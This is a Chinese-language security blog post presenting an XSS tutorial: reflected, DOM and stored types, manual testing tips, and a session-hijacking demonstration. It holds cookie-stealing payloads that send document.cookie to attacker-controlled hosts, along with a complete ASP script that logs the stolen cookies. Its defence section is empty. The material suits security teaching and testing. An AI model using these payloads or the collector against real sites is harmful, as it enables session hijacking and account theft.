<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.png?v=5.1.4">


  <link rel="mask-icon" href="/images/favicon.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="xss,">





  <link rel="alternate" href="/stom.xml" title="Goudan's blog" type="application/atom+xml">






<meta name="description" content="xss攻击原理​    xxs全称（CrossSite Scripting）跨站脚本攻击，是常见的Web应用程序安全漏洞之一，xss指攻击者在网页中嵌入客户端脚本，通常是JavaScript编写的危险代码，当用户使用浏览器浏览网页时，脚本就会在用户的浏览器上执行，从而达到攻击者的各种目的。">
<meta name="keywords" content="xss">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS漏洞总结及实战">
<meta property="og:url" content="http://goudanjun.vip/2021/01/10/XSS漏洞总结及实战.html/index.html">
<meta property="og:site_name" content="Goudan&#39;s blog">
<meta property="og:description" content="xss攻击原理​    xxs全称（CrossSite Scripting）跨站脚本攻击，是常见的Web应用程序安全漏洞之一，xss指攻击者在网页中嵌入客户端脚本，通常是JavaScript编写的危险代码，当用户使用浏览器浏览网页时，脚本就会在用户的浏览器上执行，从而达到攻击者的各种目的。">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://i.loli.net/2021/01/10/gacRS42PWVYAsIG.jpg">
<meta property="og:image" content="https://i.loli.net/2021/01/10/BJfAohunNzHQjXx.png">
<meta property="og:updated_time" content="2021-01-12T06:39:50.885Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="XSS漏洞总结及实战">
<meta name="twitter:description" content="xss攻击原理​    xxs全称（CrossSite Scripting）跨站脚本攻击，是常见的Web应用程序安全漏洞之一，xss指攻击者在网页中嵌入客户端脚本，通常是JavaScript编写的危险代码，当用户使用浏览器浏览网页时，脚本就会在用户的浏览器上执行，从而达到攻击者的各种目的。">
<meta name="twitter:image" content="https://i.loli.net/2021/01/10/gacRS42PWVYAsIG.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"right","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://goudanjun.vip/2021/01/10/XSS漏洞总结及实战.html/">





  <title>XSS漏洞总结及实战 | Goudan's blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-right page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Goudan's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-xssplatform">
          <a href="http://j36f673471.zicp.vip/xssme/index.php" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-XSSPlatform"></i> <br>
            
            XSSPlatform
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://goudanjun.vip/2021/01/10/XSS漏洞总结及实战.html/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="狗蛋菌">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Goudan's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">XSS漏洞总结及实战</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2021-01-10T11:07:53+08:00">
                2021-01-10
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Words count in article&#58;</span>
                
                <span title="Words count in article">
                  1.9k 字
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Reading time &asymp;</span>
                
                <span title="Reading time">
                  7 分钟
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="xss攻击原理"><a href="#xss攻击原理" class="headerlink" title="xss攻击原理"></a><strong>xss攻击原理</strong></h2><p>​    xxs全称（CrossSite Scripting）跨站脚本攻击，是常见的Web应用程序安全漏洞之一，xss指攻击者在网页中嵌入客户端脚本，通常是JavaScript编写的危险代码，当用户使用浏览器浏览网页时，脚本就会在用户的浏览器上执行，从而达到攻击者的各种目的。</p>
<a id="more"></a>

<p>​    xss攻击的最终目的是在网页中嵌入客户端恶意脚本代码，最常用的攻击代码是JavaScript语言，但也会使用其他互联网客户端脚本代码，例如：ActionScript，VBscript。而如今的互联网客户端脚本代码基本是基于JavaScript，所以要想深入研究xss，必须精通JavaScript。JavaScript可以用来获取用户的Cooike，改变网页的内容，弹出窗口那么存在xss漏洞的网站，xss就可以用来盗取Cooike，黑掉页面，导航到恶意网站！甚至可以完全监控你的键盘操作，模仿windows注销界面，诱导你输入开机密码！而攻击者需要做的仅仅是向你的代码中注入JavaScript代码！</p>
<h2 id="xss的危害"><a href="#xss的危害" class="headerlink" title="xss的危害"></a><strong>xss的危害</strong></h2><ol>
<li>网络钓鱼，包括盗取各类用户账号</li>
<li>窃取用户Cooikes，利用管理员身份进一步对网站执行操作：</li>
<li>劫持会话，从而执行任意的操作，例如非法转账，强制发表日志，发送电子邮件：</li>
<li>强制弹广告，刷流量等（黑帽SEO）</li>
<li>海量客户端攻击（比如DDOS）</li>
<li>获取客户端信息，比如IP地址，开放端口，网页浏览历史；</li>
<li>传播跨站脚本蠕虫</li>
<li>结合其他漏洞，如CSRF漏洞</li>
</ol>
<h2 id="xss攻击分类"><a href="#xss攻击分类" class="headerlink" title="xss攻击分类"></a><strong>xss攻击分类</strong></h2><p>主要分为三大类：反射型，DOM型，储存型</p>
<p><strong>反射型</strong>：（服务器端 ）</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$username=$_GET[<span class="string">'username'</span>];</span><br><span class="line"><span class="keyword">echo</span> $username;</span><br><span class="line"><span class="meta">?&gt;</span>    </span><br><span class="line"></span><br><span class="line"><span class="comment">#在这段代码中程序接受username值，并且输出，如果提交xss.php? username=zhangsan,那么程序并没有进行xss代码过滤，最终造成了反射型xss漏洞</span></span><br></pre></td></tr></table></figure>

<p><strong>DOM型</strong>：（在客户端上进行攻击）</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="javascript"><span class="keyword">var</span> urls=<span class="built_in">document</span>.URL;<span class="comment">//获取URL</span></span></span><br><span class="line"><span class="javascript"><span class="keyword">var</span> index=<span class="built_in">document</span>.URL.indexOf(<span class="string">"url="</span>)+<span class="number">4</span>；</span></span><br><span class="line"><span class="javascript"><span class="keyword">var</span> par = urls.substring(index);</span></span><br><span class="line"><span class="javascript"><span class="built_in">document</span>.write(<span class="built_in">decodeURI</span>(par));<span class="comment">//输入获取内容</span></span></span><br><span class="line"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!--上面代码的意思是获取URL中的urls参数的值，并且输出，如果输入http://host/domxss.php?url=&lt;script&gt;alert(/xss/)&lt;/script&gt;就可触发xss攻击的发生--&gt;</span></span><br></pre></td></tr></table></figure>

<p><strong>储存型</strong>：</p>
<p>与反射型相比，唯一的区别就是xss代码被存入了数据库中，在下次浏览时，又被读取出来</p>
<p>相对反射型，一般来说储存型的危害更大</p>
<p>真实案例：wooyun-2014-83651 凤凰网储存xss</p>
<h2 id="xss测试技巧"><a href="#xss测试技巧" class="headerlink" title="xss测试技巧"></a><strong>xss测试技巧</strong></h2><p><strong>工具检查</strong>: APPSCAN,AWVS,BurpSuit等综合型的扫描工具，但不如专门的xss检测工具（XSSER、XSSF、NoXss）效率高，不能检测储存型的xss漏洞</p>
<p><strong>手工测试</strong>：</p>
<p>常用的xss攻击脚本：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript">alert(<span class="string">"xss test!"</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript"><span class="built_in">document</span>.write(<span class="built_in">document</span>.cookie)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript"><span class="built_in">document</span>.location=<span class="string">'http://localhost/xss_savecookie.asp?xcookie='</span>+<span class="built_in">document</span>.cookie</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">javascript:alert(</span>'<span class="attr">test</span>')&gt;</span>adfasdfasdf<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">javascript:document.write(document.cookie)</span>&gt;</span>adfasdfasdf<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">javascript:document.location</span>=<span class="string">'http://192.168.24.250:83/xss_savecookie.asp?xcookie='</span>+<span class="attr">document.cookie</span>&gt;</span>点击察看详情<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line"></span><br><span class="line">http://localhost/xss_savecookie.asp?xcookie=ASPSESSIONIDAARDBTAQ=HGOPGOPCEKEPHHDEBPHJPGLB;%20gbtoyAtBD=4;%20gbtoyTime=2012%2D6%2D11+23%3A33%3A29;%20gbtoy=pass=123456&amp;user=linhai</span><br><span class="line"></span><br><span class="line">http://192.168.24.250:81/cookiesave/XSS_savecookie.asp    &amp;lt  <span class="tag">&lt;&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">javascript:document.location</span>=<span class="string">'http://192.168.24.250:81/cookiesave/XSS_savecookie.asp?xcookie='</span>+<span class="attr">document.cookie</span>&gt;</span>adfasdfasdf<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>情景一:可得知输出位置</p>
<p>使用手工测试web应用程序是否存在xss漏洞时，最重要的是考虑哪里有输入，输入的数据在哪里进行输出*。</p>
<p>在进行手工测试xss时，一定要选择有特殊意义的字符，这样可以快速检测是否存在xss，比如说测试某输入框是否存在xss漏洞，不要直接输入xss跨站语句进行测试，一步一步来更便于测试和分析。</p>
<p>比如：输入一些敏感字符，例如：<strong>&lt;,&gt;,’,”,(,)</strong> 等，在提交请求后去查看html源代码，看这些输入的字符是否被转义。</p>
<p>在输入这些字符的时候，很有可能程序已经做了过滤，那么你再寻找就不那么容易了，只是可以输入“<strong>xsser&lt;&gt;”‘&amp;</strong>”这样的字符串，然后在查找源代码的时候直接查找xsser来去定位，避免被过滤掉之后就找不到输出的位置了。</p>
<p> 情景二：无法得知输出位置</p>
<p>非常多的web应用程序源代码是不对外开放的，这时进行xss时就有可能无法得知输入数据在哪显示、</p>
<p>对于这种情况通常采用万能输入：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">"/&gt;<span class="tag">&lt;/<span class="name">textarea</span>&gt;</span><span class="tag">&lt;<span class="name">script</span>&gt;</span>alert(1)<span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p> 来进行测试</p>
<p>有些情况手工检测漏洞的效率比全自动检测软件更快，因为测试人员通过经验可以快速发现输入点，这些是扫描器无法比拟的。</p>
<p>另外一些xss漏洞也不仅仅是直接注入到HTML，可能数据中才触发，比如再上传文件时修改文件名为</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">"<span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript">alert(<span class="regexp">/xss/</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span>"</span><br></pre></td></tr></table></figure>

<p>那么程序在读文件名显示在html文档中，也会触发xss跨站漏洞的。</p>
<p>有输入的地方就可能存在着风险，如果连输入都没有，xss就不必检测了，包括其他安全漏洞</p>
<h2 id="xss实战"><a href="#xss实战" class="headerlink" title="xss实战"></a>xss实战</h2><h3 id="0x00-XSS会话劫持"><a href="#0x00-XSS会话劫持" class="headerlink" title="0x00 XSS会话劫持"></a><strong>0x00 XSS会话劫持</strong></h3><p><strong>盗取cookie：</strong></p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span>alert(doucument.cookie)<span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/01/10/gacRS42PWVYAsIG.jpg" alt="img"></p>
<p><strong>会话劫持：</strong></p>
<p>劫持的cookie代码：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript"><span class="built_in">document</span>.location=<span class="string">'http://192.168.0.25:8007/XSS_savecookie.asp?xcookie='</span>+<span class="built_in">document</span>.cookie</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>XSS_savecookie.asp：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">&lt;font size=&quot;4&quot; color=&quot;#FF0000&quot;&gt;&lt;b&gt;自动接收跨站脚本截取到的Cookie信息，保存于cookie_xss.txt文件中。&lt;/b&gt; &lt;/font&gt;</span><br><span class="line">&lt;%</span><br><span class="line">dim XCookie,StrCookieText,strLogFile,XUser</span><br><span class="line">strLogFile=&quot;cookie_xss.txt&quot;</span><br><span class="line">XCookie=request(&quot;xcookie&quot;)</span><br><span class="line">XUser=request(&quot;user&quot;)</span><br><span class="line">if XCookie=&quot;&quot;  then</span><br><span class="line">  response.write &quot;cookie信息为空！&quot;</span><br><span class="line">  response.end</span><br><span class="line">End If</span><br><span class="line">StrCookieText=StrCookieText&amp;&quot;Cookie值为：----&quot;&amp;XCookie&amp;&quot; user=&quot;&amp;XUser&amp;&quot;----&quot;&amp;request.servervariables(&quot;REMOTE_HOST&quot;)</span><br><span class="line">StrCookieText=StrCookieText&amp;&quot; &quot;&amp;date&amp;&quot; &quot;&amp;time</span><br><span class="line"></span><br><span class="line">set f=Server.CreateObject(&quot;scripting.filesystemobject&quot;)</span><br><span class="line">set ff=f.opentextfile(server.mappath(&quot;.&quot;)&amp;&quot;\&quot;&amp;strLogFile,8,true,0)</span><br><span class="line">ff.writeline(chr(13)+chr(10)&amp;StrCookieText)</span><br><span class="line">ff.close</span><br><span class="line">set ff=nothing</span><br><span class="line">set f=nothing</span><br><span class="line">                      </span><br><span class="line">response.write &quot;&lt;br&gt;&lt;br&gt;提示：此脚本仅限测试!&quot;</span><br><span class="line"></span><br><span class="line">%&gt;</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2021/01/10/BJfAohunNzHQjXx.png" alt="微信截图_20210110113640"></p>
<h2 id="xss防御策略"><a href="#xss防御策略" class="headerlink" title="xss防御策略"></a>xss防御策略</h2><h2 id="★注"><a href="#★注" class="headerlink" title="★注"></a>★注</h2><h3 id="同源策略"><a href="#同源策略" class="headerlink" title="同源策略"></a><strong>同源策略</strong></h3><p>是一种约定，他是浏览器最核心也是最基本的安全功能，可以说web是建立在同源策略的基础上的，浏览器只是针对同源策略的一种实现</p>
<p>同源策略的四大要素：</p>
<p>1，host（域名或IP地址，如果是IP地址则看作一个根域名）</p>
<p>2，子域名</p>
<p>3，端口</p>
<p>4，协议</p>
<p>对于浏览器来说受同源策略约束的有DOM，Cookie，XMLHttprequest，以及浏览器加载的第三方插件也有各自的同源策略。例如：flash，java applet，silverlight，coogle gears等。</p>
<p>不受约束的有：在浏览器中，对于标签</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="xml">,<span class="tag">&lt;<span class="name">img</span>&gt;</span>,<span class="tag">&lt;<span class="name">iframe</span>&gt;</span>,<span class="tag">&lt;<span class="name">link</span>&gt;</span></span></span><br></pre></td></tr></table></figure>

<p>等标签都可以跨域加载资源，而不受同源策略的限制。这些带有”src“属性的标签每次加载的时候，实际上是由浏览器发起的一个get请求。</p>
<h3 id="XSS平台"><a href="#XSS平台" class="headerlink" title="XSS平台"></a><strong>XSS平台</strong></h3><p>BeEF,XSS Proxy，Backframe，国内的XXSER.ME(XSS Platfrom)也是比较优秀的XSS漏洞利用框架</p>
<p>其实框架是一组”javascript“工具集合，比如实现键盘记录，点击劫持等</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/xss/" rel="tag"># xss</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/01/09/ssrf漏洞总结及实战.html/" rel="next" title="SSRF漏洞总结及实战">
                <i class="fa fa-chevron-left"></i> SSRF漏洞总结及实战
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/01/17/python3安装第三方包时ssl报错.html/" rel="prev" title="python3安装第三方包时ssl报错">
                python3安装第三方包时ssl报错 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">狗蛋菌</p>
              <p class="site-description motion-element" itemprop="description">Stay Hungry,Stay Foolish</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">25</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">22</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/stom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/goudanjun" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#xss攻击原理"><span class="nav-number">1.</span> <span class="nav-text">xss攻击原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#xss的危害"><span class="nav-number">2.</span> <span class="nav-text">xss的危害</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#xss攻击分类"><span class="nav-number">3.</span> <span class="nav-text">xss攻击分类</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#xss测试技巧"><span class="nav-number">4.</span> <span class="nav-text">xss测试技巧</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#xss实战"><span class="nav-number">5.</span> <span class="nav-text">xss实战</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x00-XSS会话劫持"><span class="nav-number">5.1.</span> <span class="nav-text">0x00 XSS会话劫持</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#xss防御策略"><span class="nav-number">6.</span> <span class="nav-text">xss防御策略</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#★注"><span class="nav-number">7.</span> <span class="nav-text">★注</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#同源策略"><span class="nav-number">7.1.</span> <span class="nav-text">同源策略</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#XSS平台"><span class="nav-number">7.2.</span> <span class="nav-text">XSS平台</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2019 &mdash; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">狗蛋菌</span>

  
</div>





 



 




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  



  
  









  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three.min.js"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three-waves.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
